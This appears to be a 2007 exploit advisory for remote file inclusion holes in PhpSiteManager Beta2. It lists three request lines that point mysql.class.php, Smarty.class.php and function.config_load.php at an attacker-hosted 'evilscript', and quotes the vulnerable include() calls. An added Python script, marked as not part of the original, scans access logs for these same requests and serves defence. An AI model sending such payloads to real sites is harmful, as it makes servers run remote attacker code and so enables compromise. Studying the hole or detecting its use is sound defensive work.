PhpSiteManager-Beta2 Remote File Inclusion Vulnerability
Version Released    2007-05-01
------------------|
Timeline:10:11:07 |
------------------|
Download : 
--------------------------------------------------------------------------------------------------------|
http://downloads.sourceforge.net/phpsitemanager/phpSiteManager-Beta2.zip?modtime=1178024627&big_mirror=0|
--------------------------------------------------------------------------------------------------------|
--------|
Exploit |
--------|
----------------------------------------------------------------------------*              
/mysql.class.php?filename=http://host.com[evilscript.txt?]                  *
                                                                            *
/smarty.class.php?smarty_compile_path=http://host.com/evilscript?           *
                                                                            *
/function.config_load.php?compile_file=http://host.com/evilscript?          * 
----------------------------------------------------------------------------*
bug:
---
mysql.class.php: include($filename)
$filename = $server_root . 'cache/sql_' . $hash . '.php';
bug:
---
Smarty.class.php: include($_smarty_compile_path)
bug:
---
function.config_load.php: include($_compile_file)
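Detection sketch for the three requests listed above (an added example, not part of the original advisory): it scans web server access logs for the affected scripts being called with a URL in the listed parameters. The combined log format, the /psm/ install path, the host name and the function name find_inclusion_attempts are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters from the advisory's request lines and include() lines.
WATCHED = {
    "mysql.class.php": {"filename"},
    "smarty.class.php": {"smarty_compile_path", "_smarty_compile_path"},
    "function.config_load.php": {"compile_file", "_compile_file"},
}
# A value that names a remote or wrapper scheme instead of a local path.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Assumed log layout: Apache/nginx "combined" format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

def find_inclusion_attempts(lines):
    """Return (client, script, parameter, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1].lower()
        params = WATCHED.get(script)
        if params is None:
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F is caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in params and REMOTE.match(value):
                hits.append((client, script, name, status))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /psm/mysql.class.php?filename=http://host.example/x.txt? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /psm/libs/Smarty.class.php?smarty_compile_path=http%3A%2F%2Fhost.example%2Fx%3F HTTP/1.1" 500 0 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /psm/index.php?page=home HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /psm/mysql.class.php?filename=cache/sql_ab12.php HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status deserves closer review than one answered with 403 or 404, since the script was reached and executed.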
-------|
Author |
-------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy@[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member: "we're not the only ones but we're the best"
---|
EOF|
---|